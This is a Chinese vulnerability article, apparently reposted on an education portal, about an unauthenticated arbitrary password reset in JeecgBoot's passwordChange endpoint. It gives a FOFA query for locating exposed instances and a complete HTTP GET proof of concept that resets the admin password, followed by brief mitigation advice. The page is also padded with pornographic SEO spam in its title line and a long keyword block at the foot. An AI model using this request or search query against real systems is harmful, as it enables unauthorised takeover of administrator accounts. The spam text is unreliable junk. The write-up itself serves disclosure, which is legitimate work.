免费在线a视频-免费在线观看a视频-免费在线观看大片影视大全-免费在线观看的视频-色播丁香-色播基地

【漏洞文章】JeecgBoot 任意用戶密碼重置

:2024年12月16日 小羊安全屋
分享到:

該文章介紹了一個名為"JeecgBoot框架passwordChange接口"的安全漏洞,該漏洞允許任意用戶密碼重置。漏洞復(fù)現(xiàn)漏洞URL:/novat-boot/sys/user/passwordChange漏洞參數(shù):username...

導(dǎo)言

文章僅用作網(wǎng)絡(luò)安全人員對自己網(wǎng)站、服務(wù)器等進(jìn)行自查檢測,不可用于其他用途,未經(jīng)授權(quán)請勿利用文章中的技術(shù)資料對任何計算機(jī)系統(tǒng)進(jìn)行入侵操作,由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)任何責(zé)任。切勿用于網(wǎng)絡(luò)攻擊!??!

PART 

漏洞描述

JeecgBoot框架passwordChange接口存在任意用戶密碼重置漏洞,未經(jīng)身份驗證的遠(yuǎn)程攻擊者可以利用此漏洞重置管理員賬戶密碼,從而接管系統(tǒng)后臺,造成信息泄露,導(dǎo)致系統(tǒng)處于極不安全的狀態(tài)。

漏洞復(fù)現(xiàn)

漏洞URL:/novat-boot/sys/user/passwordChange

漏洞參數(shù):username、password

F O F A :body="/sys/common/pdf/pdfPreviewIframe"

漏洞詳情:

1、打開自己的服務(wù)

djEvV2ZSYnc3MVdlb3ltc2VGRnN5MW9DZF94VUN1Q1BBNW9sWXNYaUlwcjRXMmFJczMxTHJMQmFMTGZxSEFvZTBYSzJHaUszQko0dkNHOGxXckk0ZFhGTUZfNl9ya2oxaXk1bVZqR01XNzhoSjQ9.jpg

2、使用以下POC進(jìn)行驗證

GET /novat-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone= HTTP/1.1

Host: 127.0.0.1:8088

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

3、漏洞利用成功

djEvQ1ZHd2NlUTlZM1F0RjlHbkxWaGdMNmpDZUg1Um1NMmRmTHM1SU5vakF2Q1RuZXZpUWdWWWsyV09ZQjY1bzR5dzZtUE5idDNqbGZqbWRibDlPRHFVUjFfNl9ya2oxaXk1bVZqR01XNzhoSjQ9.jpg

修復(fù)建議

官網(wǎng)目前未發(fā)布補(bǔ)丁,建議禁止對互聯(lián)網(wǎng)開放,或采用白名單方式限制訪問。

原文來源:https://mp.weixin.qq.com/s/G5DiGrVbYKmftBLJ06NmQg

[我要糾錯]
[編輯:宋聰喬 &發(fā)表于江蘇]
關(guān)鍵詞: 導(dǎo)言 文章 用作 網(wǎng)絡(luò)安全 人員

來源:本文內(nèi)容搜集或轉(zhuǎn)自各大網(wǎng)絡(luò)平臺,并已注明來源、出處,如果轉(zhuǎn)載侵犯您的版權(quán)或非授權(quán)發(fā)布,請聯(lián)系小編,我們會及時審核處理。
聲明:江蘇教育黃頁對文中觀點(diǎn)保持中立,對所包含內(nèi)容的準(zhǔn)確性、可靠性或者完整性不提供任何明示或暗示的保證,不對文章觀點(diǎn)負(fù)責(zé),僅作分享之用,文章版權(quán)及插圖屬于原作者。

點(diǎn)個贊
0
踩一腳
0

您在閱讀:【漏洞文章】JeecgBoot 任意用戶密碼重置

Copyright©2013-2025 ?JSedu114 All Rights Reserved. 江蘇教育信息綜合發(fā)布查詢平臺保留所有權(quán)利

蘇公網(wǎng)安備32010402000125 蘇ICP備14051488號-3技術(shù)支持:南京博盛藍(lán)睿網(wǎng)絡(luò)科技有限公司

南京思必達(dá)教育科技有限公司版權(quán)所有   百度統(tǒng)計

主站蜘蛛池模板: 国产精品欧美亚洲韩国日本 | 在线播放黄色片 | 男女做污污无遮挡激烈免费 | 国产 麻豆 欧美亚洲综合久久 | 成人免费网站视频www | 伊人久久中文 | 一级黄色片免费播放 | 婷婷亚洲久悠悠色悠在线播放 | 亚洲va精品中文字幕动漫 | 看黄视频 | 黄网站色年片在线观看 | 韩国日本三级在线 | 午夜在线观看免费影院 | 羞羞网站免费 | 欧洲性xxx| 欧美精品国产日韩综合在线 | 天堂在线www网亚洲 天堂网在线网站成人午夜网站 | 鸥美一级黄色片 | 妞干网手机免费视频 | 国产成人刺激视频在线观看 | 一级黄色录像大片 | 国产成人精品福利网站人 | 中国特黄毛片 | 国产一区二区三区不卡免费观看 | 久久黄色一级片 | 成人国产一区二区 | 北条麻妃初尝试黑人在线观看 | 午夜dj免费高清在线观看影院 | 色美女影院 | 国产成人手机在线 | 在线看片a | h视频在线免费 | 免费麻豆国产黄网站在线观看 | 日本中文字幕一区二区 | 小妖精抬起臀嗯啊h军人小说 | 亚洲人成网站在线观看青青 | 日韩欧美一区黑人vs日本人 | 亚洲综合伊人 | 精品日韩欧美 | 国产综合精品在线 | 欧美成人三级网站 |
最熱文章
最新文章
  • 阿里云上云鉅惠,云產(chǎn)品享最低成本,有需要聯(lián)系,
  • 卡爾蔡司鏡片優(yōu)惠店,鏡片價格低
  • 蘋果原裝手機(jī)殼